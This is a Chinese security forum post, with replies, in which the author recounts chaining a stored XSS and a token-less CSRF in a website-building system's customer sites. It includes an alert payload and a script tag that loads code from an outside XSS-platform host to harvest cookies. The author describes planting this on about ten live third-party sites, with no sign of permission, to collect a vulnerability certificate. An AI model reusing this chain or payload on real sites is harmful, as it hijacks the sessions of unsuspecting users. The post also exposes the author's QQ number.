用户
搜索
  • TA的每日心情
    郁闷
    2020-2-3 09:35
  • 签到天数: 3 天

    连续签到: 1 天

    [LV.2]偶尔看看

    i春秋-脚本小子

    Rank: 2

    4

    主题

    19

    帖子

    117

    魔法币
    收听
    1
    粉丝
    0
    注册时间
    2018-7-30
    发表于 2020-8-18 16:15:52 62899
    本帖最后由 J1Z0n 于 2020-8-18 16:30 编辑

    某日想整张cnvd证书,把自己一次渗透过程记录下来
    1.
    首先找到一个建站系统选定目标官网首先长这样,部分敏感字符脱敏处理
    图片1.png
    2.
    客户案例里面随便找了一个网站,一套基本流程下来,没有发现sql什么之类的漏洞,但是找到一个存储xsspayload<img src=1 onerror=alert(1)>,经典弹窗
    图片2.png
    3.
    当然咯,一个self xss 肯定是没办法拿证书的,毕竟cnvd评分太低了,此时就想到了xss+csrf组合拳,我们bp抓取一波修改个人信息的数据包,发现没有token验证,此时就可以试试是否存在csrf了,生成一个poc
    QQ截图20200818160542.png
    4.
    好小子,切换一个账户登录,直接修改成功了,这里也可以在poc中加入一些js代码,达到某些特殊的目的,反正看个人思路猥琐不猥琐

    QQ截图20200818160757.png
    5.
    随便找了个xss平台,生成了一个payload ,payloadx<sCRiPt/SrC=//xsshs.cn/vl3D>
    此时将个人信息修改为<sCRiPt/SrC=//xsshs.cn/vl3D>再生成csrf poc
    接下来就是各种打cookie的操作了,这里我贴图,凑够了10个案例就交cnvd去了
    4.png 3.png 5.png
    6.
    接下来就是漫长的等待,文章也差不多了,我是弟弟,各位表哥可以加我qq交流一下技术  1852965621
    QQ截图20200818162347.png

    本帖被以下淘专辑推荐:

    顶我J牛
    使用道具 举报 回复
    发表于 2020-8-19 16:44:58
    使用道具 举报 回复
    发表于 2020-8-19 17:28:31

    顶我J牛
    使用道具 举报 回复
    发表于 2020-8-20 11:23:45
    强呀!
    使用道具 举报 回复
    发表于 2020-8-20 11:23:54
    感谢分享
    使用道具 举报 回复
    referer里域名没打码,表哥
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册